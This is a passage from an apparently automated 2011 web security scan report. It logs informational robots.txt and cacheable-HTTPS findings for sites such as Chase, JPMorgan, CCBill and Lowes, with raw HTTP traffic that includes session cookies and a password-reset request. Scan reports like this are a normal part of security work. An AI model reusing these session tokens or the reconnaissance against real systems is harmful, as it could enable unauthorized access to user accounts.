22.19. http://stats.adobe.com/b/ss/mxmacromedia/1/H.23.3/s22758062051143 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://stats.adobe.com
Path:	/b/ss/mxmacromedia/1/H.23.3/s22758062051143

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: stats.adobe.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:24 GMT
Server: Omniture DC/2.0.0
Last-Modified: Tue, 28 Sep 2010 18:58:27 GMT
ETag: "ac474-18-6e161ac0"
Accept-Ranges: bytes
Content-Length: 24
xserver: www23
Keep-Alive: timeout=15
Connection: close
Content-Type: text/plain

User-agent: *
Disallow:

22.20. http://tag.admeld.com/pixel previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://tag.admeld.com
Path:	/pixel

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: tag.admeld.com

Response

HTTP/1.0 200 OK
Server: Apache
P3P: policyref="http://tag.admeld.com/w3c/p3p.xml", CP="DEVo PSDo OUR BUS DSP ALL COR"
Last-Modified: Fri, 01 Jul 2011 14:31:20 GMT
ETag: "434ff1-1a-4a702df00fe00"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 12 Jul 2011 20:39:55 GMT
Connection: close

User-agent: *
Disallow: /

22.21. http://trustedcs.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://trustedcs.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: trustedcs.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 18:09:01 GMT
Server: Apache
Last-Modified: Wed, 26 May 2010 20:26:24 GMT
ETag: "1d7a33-b5-4bfd83f0"
Accept-Ranges: bytes
Content-Length: 181
Connection: close
Content-Type: text/plain

User-agent: *
Disallow: /cgi-bin/
Disallow: /CVS/
Disallow: /Templates/
Disallow: /Library/
Disallow: /images/
Disallow: /email_images/
Disallow: /js/
Disallow: /download/

22.22. http://www.apple.com/itunes previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.apple.com
Path:	/itunes

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.apple.com

Response

HTTP/1.0 200 OK
Last-Modified: Tue, 06 Jan 1998 23:24:02 GMT
ETag: "41-3241c557be880"
Server: Apache/2.2.3 (Oracle)
X-Cached-Time: Tue, 28 Jun 2011 16:02:18 GMT
Cneonction: close
X-N: S
X-Cache-TTL: 600
nnCoection: close
ntCoent-Length: 65
Content-Type: text/plain; charset=utf-8
Cache-Control: max-age=430
Expires: Tue, 12 Jul 2011 18:06:15 GMT
Date: Tue, 12 Jul 2011 17:59:05 GMT
Content-Length: 65
Connection: close

# robots.txt for http://www.apple.com/
User-agent: *
Disallow:

22.23. http://www.burstnet.com/enlightn/8171/99D2/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.burstnet.com
Path:	/enlightn/8171/99D2/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.burstnet.com

Response

HTTP/1.0 200 OK
Server: Apache (Unix)
P3P: policyref="http://www.burstnet.com/w3c/p3p.xml", CP="NOI DSP LAW PSAa PSDa OUR IND UNI COM NAV STA"
Last-Modified: Tue, 09 Mar 1999 03:20:24 GMT
ETag: "1100ae-1a-36e49378"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain
Date: Tue, 12 Jul 2011 20:39:27 GMT
Connection: close

User-agent: *
Disallow: /

22.24. http://www.gravatar.com/avatar/ad516503a11cd5ca435acc9bb6523536 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.gravatar.com
Path:	/avatar/ad516503a11cd5ca435acc9bb6523536

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.gravatar.com

Response

HTTP/1.1 200 OK
Server: nginx
Date: Tue, 12 Jul 2011 20:47:13 GMT
Content-Type: text/plain
Connection: close
Last-Modified: Tue, 18 Jan 2011 12:04:24 GMT
Accept-Ranges: bytes
Content-Length: 99
Vary: Accept-Encoding

User-Agent: *
Disallow: /*.json
Disallow: /*.xml
Disallow: /*.php
Disallow: /*.vcf
Disallow: /*.qr

22.25. http://www.imiclk.com/cgi/r.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.imiclk.com
Path:	/cgi/r.cgi

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.imiclk.com

Response

HTTP/1.0 200 OK
Server: Apache/2.0.63 (CentOS)
Last-Modified: Tue, 22 Mar 2011 15:09:46 GMT
ETag: "1d807d-1a-49f13a27ae280"
Accept-Ranges: bytes
Content-Length: 26
Content-Type: text/plain; charset=UTF-8
Date: Tue, 12 Jul 2011 20:39:17 GMT
Connection: close

User-agent: *
Disallow: /

22.26. http://www.interactivemediaawards.com/winners/certificate.asp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.interactivemediaawards.com
Path:	/winners/certificate.asp

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.interactivemediaawards.com

Response

HTTP/1.1 200 OK
Content-Type: text/plain
Last-Modified: Thu, 17 Mar 2011 18:28:00 GMT
Accept-Ranges: bytes
ETag: "5e5ab8bd1e4cb1:0"
Server: Microsoft-IIS/7.0
X-Powered-By: ASP.NET
Date: Wed, 13 Jul 2011 00:36:23 GMT
Connection: close
Content-Length: 287

User-Agent: *
Disallow: /_notes/
Disallow: /123administration/
Disallow: /include/
Disallow: /email/
Disallow: /oldstuff/
Disallow: /sandbox/
Disallow: /aspnet_client/
Disallow: /browserhawk/
...[SNIP]...

22.27. http://www.lowes.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.lowes.com
Path:	/

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowes.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 13 Jun 2011 17:53:42 GMT
Content-Type: text/plain
Expires: Tue, 12 Jul 2011 21:30:47 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:30:47 GMT
Content-Length: 521
Connection: close
Set-Cookie: akaau=1310508047~id=555ff81eba66b18e3e9e19529b94c6db; path=/

# robots.txt for http://www.lowes.com/

User-agent: *
Disallow: /*cm_cr=*
Disallow: /*No=*
Disallow: /*rpp=*
Disallow: /*OrderItemAdd*
Disallow: /webapp/wcs/stores/servlet/OrderItemAdd*
Disall
...[SNIP]...

22.28. https://www.lowes.com/webapp/wcs/stores/servlet/UserRegistrationForm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.lowes.com
Path:	/webapp/wcs/stores/servlet/UserRegistrationForm

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.lowes.com

Response

HTTP/1.0 200 OK
Last-Modified: Mon, 13 Jun 2011 17:53:42 GMT
Content-Type: text/plain
Expires: Tue, 12 Jul 2011 21:31:39 GMT
Cache-Control: max-age=0, no-cache, no-store
Pragma: no-cache
Date: Tue, 12 Jul 2011 21:31:39 GMT
Content-Length: 521
Connection: close

# robots.txt for http://www.lowes.com/

User-agent: *
Disallow: /*cm_cr=*
Disallow: /*No=*
Disallow: /*rpp=*
Disallow: /*OrderItemAdd*
Disallow: /webapp/wcs/stores/servlet/OrderItemAdd*
Disall
...[SNIP]...

22.29. http://www.ox.popcap.com/delivery/afr.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.ox.popcap.com
Path:	/delivery/afr.php

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.ox.popcap.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:39:27 GMT
Server: Apache
Last-Modified: Fri, 26 Nov 2010 21:27:54 GMT
ETag: "ca11-17e-495fb6532ca80"
Accept-Ranges: bytes
Content-Length: 382
Vary: Accept-Encoding
Connection: close
Content-Type: text/plain

# This robots.txt file requests that search engines and other
# automated web-agents don't try to index the files in this
# directory (/www/). This file is required in the event that
# you use OpenX w
...[SNIP]...

22.30. http://www.popcap.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.popcap.com
Path:	/favicon.ico

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.popcap.com

Response

HTTP/1.1 200 OK
Server: nginx
Content-Type: text/plain
Cache-Control: max-age=1
Expires: Tue, 12 Jul 2011 20:39:23 GMT
Last-Modified: Wed, 21 Apr 2010 22:48:30 GMT
ETag: "3c67e7-5a-4bcf80be"
X-Frame-Options: sameorigin
X-Cacheable: NO: !beresp.cacheable
Content-Length: 90
Date: Tue, 12 Jul 2011 20:39:22 GMT
X-Varnish: 1419684083
Age: 0
Via: 1.1 varnish
Connection: close
X-Varnish-IP: .71
X-Cache: MISS

User-Agent: *
Disallow: /microsite/blitzpc/

Sitemap: http://www.popcap.com/sitemap.xml

22.31. http://www.youtube.com/embed/IHmPw1HsCe4 previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www.youtube.com
Path:	/embed/IHmPw1HsCe4

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www.youtube.com

Response

HTTP/1.0 200 OK
Date: Tue, 12 Jul 2011 20:46:30 GMT
Server: Apache
Last-Modified: Wed, 29 Jun 2011 16:50:42 GMT
ETag: "21b-4a6dc95bc3c80"
Accept-Ranges: bytes
Content-Length: 539
Vary: Accept-Encoding
Content-Type: text/plain

# robots.txt file for YouTube
# Created in the distant future (the year 2000) after
# the robotic uprising of the mid 90's which wiped out all humans.

User-agent: Mediapartners-Google*
Disallow:

Use
...[SNIP]...

22.32. http://www7.lowes.com/eluminate previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	http://www7.lowes.com
Path:	/eluminate

Issue detail

The web server contains a robots.txt file.

Request

GET /robots.txt HTTP/1.0
Host: www7.lowes.com

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 21:30:50 GMT
Server: Apache
P3P: CP="NON DSP COR CUR ADMo DEVo PSAo PSDo OUR IND ONL UNI PUR COM NAV INT DEM STA"
Last-Modified: Mon, 16 Apr 2007 20:12:03 GMT
ETag: "273b3c-1c-4623d893"
Accept-Ranges: bytes
Content-Length: 28
Keep-Alive: timeout=300, max=914
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

User-agent: *
Disallow: /

23. Cacheable HTTPS response previous next
There are 40 instances of this issue:

https://access.jpmorgan.com/content/tssweb/shared/document/PP403.html
https://admin.ccbill.com/favicon.ico
https://admin.ccbill.com/loginIndex.cgi
https://admin.ccbill.com/loginMM.cgi
https://affiliateadmin.ccbill.com/
https://affiliateadmin.ccbill.com/favicon.ico
https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr
https://pwr.jpmorgan.com/pwreset/forgotp1.validateusersubmit.epr
https://store.popcap.com/js/s_code.php
https://support.ccbill.com/
https://www.ccbill.com/developers/index.php
https://www.ccbill.com/developers/security/vulnerability-reward-registration.php
https://www.ccbill.com/favicon.ico
https://www.chase.com/
https://www.chase.com/ccp/index.jsp
https://www.chase.com/ccpmweb/shared/document/webtrends.html
https://www.chase.com/index.jsp
https://www.chase.com/online/Checking/gift-card.htm
https://www.chase.com/online/Home/article/Homepage_pixel_frameset.htm
https://www.chase.com/psmhelp/index.jsp
https://www.lowes.com/server-status
https://www.ri.gov/Licensing/
https://www.ri.gov/about/
https://www.ri.gov/about/awards.php
https://www.ri.gov/about/staff.php
https://www.ri.gov/government/
https://www.ri.gov/help/
https://www.ri.gov/img/favicon.ico
https://www.ri.gov/information/
https://www.ri.gov/phonebook/
https://www.ri.gov/policies/
https://www.ri.gov/policies/access/
https://www.ri.gov/policies/disclaimer/
https://www.ri.gov/policies/legal/
https://www.ri.gov/policies/links/
https://www.ri.gov/policies/privacy/
https://www.ri.gov/search/
https://www.ri.gov/towns/
https://www.ri.gov/type/junction_02-webfont.woff
https://www.ri.gov/visit/

Issue description

Unless directed otherwise, browsers may store a local cached copy of content received from web servers. Some browsers, including Internet Explorer, cache content accessed via HTTPS. If sensitive information in application responses is stored in the local cache, then this may be retrieved by other users who have access to the same computer at a future time.

Issue remediation

The application should return caching directives instructing browsers not to store local copies of any sensitive data. Often, this can be achieved by configuring the web server to prevent caching for relevant paths within the web root. Alternatively, most web development platforms allow you to control the server's caching directives from within individual scripts. Ideally, the web server should return the following HTTP headers in all responses containing sensitive content:

Cache-control: no-store
Pragma: no-cache

23.1. https://access.jpmorgan.com/content/tssweb/shared/document/PP403.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://access.jpmorgan.com
Path:	/content/tssweb/shared/document/PP403.html

Request

GET /content/tssweb/shared/document/PP403.html HTTP/1.1
Host: access.jpmorgan.com
Connection: keep-alive
Referer: http://burp/show/8
Cache-Control: max-age=0
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:32:34 GMT
Server: Apache
Last-Modified: Sun, 27 Mar 2011 01:40:29 GMT
Accept-Ranges: bytes
Vary: Accept-Encoding
Content-Length: 2007
Keep-Alive: timeout=5, max=200
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1

<html>
<head>
<title>Portal Error</title>
<meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">
<link href="/content/tssweb/shared/document/jpma.css" rel="stylesheet" type="text
...[SNIP]...

23.2. https://admin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/favicon.ico

Request

Response

23.3. https://admin.ccbill.com/loginIndex.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginIndex.cgi

Request

Response

23.4. https://admin.ccbill.com/loginMM.cgi previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://admin.ccbill.com
Path:	/loginMM.cgi

Request

Response

23.5. https://affiliateadmin.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/

Request

Response

23.6. https://affiliateadmin.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://affiliateadmin.ccbill.com
Path:	/favicon.ico

Request

Response

23.7. https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://pwr.jpmorgan.com
Path:	/pwreset/forgotp1.validateuserdsp.epr

Request

GET /pwreset/forgotp1.validateuserdsp.epr HTTP/1.1
Host: pwr.jpmorgan.com
Connection: keep-alive
Referer: https://access.jpmorgan.com/appmanager/jpmalogonportal/jpmalogonhome?TYPE=33554433&REALMOID=06-fffbf770-11bc-1000-8bb3-832aeae60cb3&GUID=&SMAUTHREASON=0&METHOD=GET&SMAGENTNAME=jpmawbp&TARGET=$SM$https%3a%2f%2ftssportal%2ejpmorgan%2ecom%2fpp%2fpp%2fWSQ%2fservlet%2fappmanager%2fjpmaportal%2fjpmahome&brand=jpma
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:33:31 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 18764

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

           <link href="css/common/Porta
...[SNIP]...

23.8. https://pwr.jpmorgan.com/pwreset/forgotp1.validateusersubmit.epr previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://pwr.jpmorgan.com
Path:	/pwreset/forgotp1.validateusersubmit.epr

Request

POST /pwreset/forgotp1.validateusersubmit.epr HTTP/1.1
Host: pwr.jpmorgan.com
Connection: keep-alive
Referer: https://pwr.jpmorgan.com/pwreset/forgotp1.validateuserdsp.epr
Content-Length: 40
Cache-Control: max-age=0
Origin: https://pwr.jpmorgan.com
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Content-Type: application/x-www-form-urlencoded
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: __utma=214076236.1737127818.1310484492.1310484492.1310486858.2; __utmb=214076236.6.10.1310486858; __utmc=214076236; __utmz=214076236.1310484492.1.1.utmcsr=(direct)|utmccn=(direct)|utmcmd=(none); s_cc=true; s_sq=jpmassetmgmtparent%2Cjpmassetmgmt%3D%2526pid%253DUK%252520Press%252520Office%2526pidt%253D1%2526oid%253Dhttp%25253A//www.jpmorgan.com/pages/jpmorgan/private_banking%2526ot%253DA; BRAND=jpma; JPMASSP=ytQpTc2K599jh7DtTjvpPKT7m4nbyHgsHG4fPytFbyTTBfL2ydBS!959395117!-800210957; TARGET_URL=https://tssportal.jpmorgan.com/pp/pp/WSQ/servlet/appmanager/jpmaportal/jpmahome; EPRWLJPMCSession=gV97Tc3bnW78dq9JCTJyTZ9v6T36yCK8nppp69lX8f4GxGgJx4bx!-236277731!NONE

perform=nextButton&userid=&emailentered=

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 16:33:41 GMT
Server: Apache
X-Powered-By: Servlet/2.5 JSP/2.1
Keep-Alive: timeout=5, max=100
Connection: Keep-Alive
Content-Type: text/html; charset=ISO-8859-1
Content-Length: 19303

<!DOCTYPE HTML PUBLIC "-//W3C//DTD HTML 4.01 Transitional//EN">
<html>
   <head>
       <meta http-equiv="Content-Type" content="text/html; charset=iso-8859-1">

           <link href="css/common/Porta
...[SNIP]...

23.9. https://store.popcap.com/js/s_code.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://store.popcap.com
Path:	/js/s_code.php

Request

GET /js/s_code.php HTTP/1.1
Host: store.popcap.com
Connection: keep-alive
Referer: https://store.popcap.com/passport_login.php
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: */*
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: user_id=461b1f76-758a-4ffe-87df-c12b77a2c13c; lcid=1033; geo_location=US; demographics=000000000000000; cookie_version=5; s_vnum=1312174800889%26vn%3D1; s_fv=flash%2010; __utma=163442877.1858697665.1310503156.1310503156.1310503156.1; __utmc=163442877; __utmz=163442877.1310503156.1.1.utmccn=(direct)|utmcsr=(direct)|utmcmd=(none); __qca=P0-1840915809-1310503155904; s_vi=[CS]v1|270E587F051D3BC7-60000103000EBB3F[CE]; s_cc=true; __utmb=163442877; s_invisit=true; s_sq=popcapcom%3D%2526pid%253DGame%252520List%2526pidt%253D1%2526oid%253Dhttp%25253A//www.popcap.com/%2526ot%253DA; PHPSESSID=82rvc45ec9c02afcbeu2lourh7; lv=1310503202; user_profile=003000000000000

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 20:40:10 GMT
Server: Apache
Vary: Accept-Encoding
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/html
Content-Length: 32015

/* SiteCatalyst code version: H.14.
Copyright 1997-2008 Omniture, Inc. More info available at
http://www.omniture.com */
/************************ ADDITIONAL FEATURES ************************

...[SNIP]...

23.10. https://support.ccbill.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://support.ccbill.com
Path:	/

Request

Response

23.11. https://www.ccbill.com/developers/index.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/developers/index.php

Request

Response

23.12. https://www.ccbill.com/developers/security/vulnerability-reward-registration.php previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/developers/security/vulnerability-reward-registration.php

Request

Response

23.13. https://www.ccbill.com/favicon.ico previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.ccbill.com
Path:	/favicon.ico

Request

GET /favicon.ico HTTP/1.1
Host: www.ccbill.com
Connection: keep-alive
Accept: */*
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: CCBILL_REFERRER=700080; __utma=250776793.28934213.1306890612.1306890612.1310490247.2; __utmb=250776793.3.10.1310490247; __utmc=250776793; __utmz=250776793.1310490278.2.3.utmcsr=google|utmccn=(organic)|utmcmd=organic|utmctr=ccbill%20vulnerability%20rewards

Response

HTTP/1.1 200 OK
Date: Tue, 12 Jul 2011 17:07:49 GMT
Server: Apache
Last-Modified: Wed, 03 Nov 2010 18:07:48 GMT
ETag: "3043993e-37e-eb3c2500"
Accept-Ranges: bytes
Content-Length: 894
Keep-Alive: timeout=15, max=100
Connection: Keep-Alive
Content-Type: text/plain; charset=UTF-8

..............h.......(....... ................................................[.j@..U....................................O...d...........}............................O...............................
...[SNIP]...

23.14. https://www.chase.com/ previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/

Request

GET / HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 15:28:37 GMT
Content-length: 135437
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Tue, 12 Jul 2011 05:50:16 GMT
Etag: "2110d-4e1be098"
Accept-ranges: bytes
Connection: close

<!DOCTYPE html PUBLIC "-//W3C//DTD HTML 4.01//EN" "http://www.w3.org/TR/html4/strict.dtd">
<html xmlns:xalan="http://xml.apache.org/xalan" xmlns:java="http://xml.apache.org/xslt/java" LANG="EN"><head>
...[SNIP]...

23.15. https://www.chase.com/ccp/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/ccp/index.jsp

Request

Response

23.16. https://www.chase.com/ccpmweb/shared/document/webtrends.html previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/ccpmweb/shared/document/webtrends.html

Request

GET /ccpmweb/shared/document/webtrends.html?currentURL=https%3A//www.chase.com%3A443/index.jsp%3Fpg_name%3Dccpmapp/generic/shared/page/chase_search%26q%3Dxss%26emptyQueryText%3Dfalse&page_name=ccpmapp/generic/shared/page/chase_search&jpmc_site=chase_global_microsite HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/ccp/index.jsp?pg_name=ccpmapp/generic/shared/page/chase_search&q=xss&emptyQueryText=false
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:15:22 GMT
Content-length: 0
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Last-modified: Fri, 16 Jul 2010 11:46:09 GMT
Etag: "0-4c404681"
Accept-ranges: bytes

23.17. https://www.chase.com/index.jsp previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/index.jsp

Request

GET /index.jsp?pg_name=ccpmapp/individuals/international/page/international_banking HTTP/1.1
Host: www.chase.com
Connection: keep-alive
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=zrCbTczJG7b5gdC2pkJLRXST1yLZ7DJLL5Mmcv9PzCS1PvTnvVJV!1300205596; s_cc=true; s_sq=jpmcchasecom%3D%2526pid%253Dhttps%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/individuals/shared/page/OpenAnAccount%2526oid%253Dhttp%25253A//www.chase.com/ccp/index.jsp%25253Fpg_name%25253Dccpmapp/smallbusiness/business_banking/page/bb_checking_o%2526ot%253DA

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:16:29 GMT
Content-type: text/html;charset=UTF-8
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 52579

<html LANG="EN" >

<head>

<link rel='stylesheet' type='text/css' href='/ccpmweb/shared/document/ChaseGlobal.css'/>

<script language="Javascript1.2" type="tex
...[SNIP]...

23.18. https://www.chase.com/online/Checking/gift-card.htm previous next

Summary

Severity:	Information
Confidence:	Certain
Host:	https://www.chase.com
Path:	/online/Checking/gift-card.htm

Request

GET /online/Checking/gift-card.htm HTTP/1.1
Host: www.chase.com
Connection: keep-alive
Referer: https://www.chase.com/
User-Agent: Mozilla/5.0 (Windows NT 6.1; WOW64) AppleWebKit/534.24 (KHTML, like Gecko) Chrome/11.0.696.77 Safari/534.24
Accept: application/xml,application/xhtml+xml,text/html;q=0.9,text/plain;q=0.8,image/png,*/*;q=0.5
Accept-Encoding: gzip,deflate,sdch
Accept-Language: en-US,en;q=0.8
Accept-Charset: ISO-8859-1,utf-8;q=0.7,*;q=0.3
Cookie: v1st=DA5FE6157943874D; ASP.NET_SessionId=oqqkyr45scueoy553qpmfr45; DCTMSESSION=J7K3TcxWLP29zSLjK11TchjW3ydQvwFRmsxsnT2L2Gzmn2NqR6jq!1272186516

Response

HTTP/1.1 200 OK
Server: JPMC1.0
Date: Tue, 12 Jul 2011 16:08:38 GMT
Content-type: text/html
CP: "NOI DSP COR NID ADM DEV PSA OUR IND UNI PUR COM NAV INT STA"
Content-Length: 16348

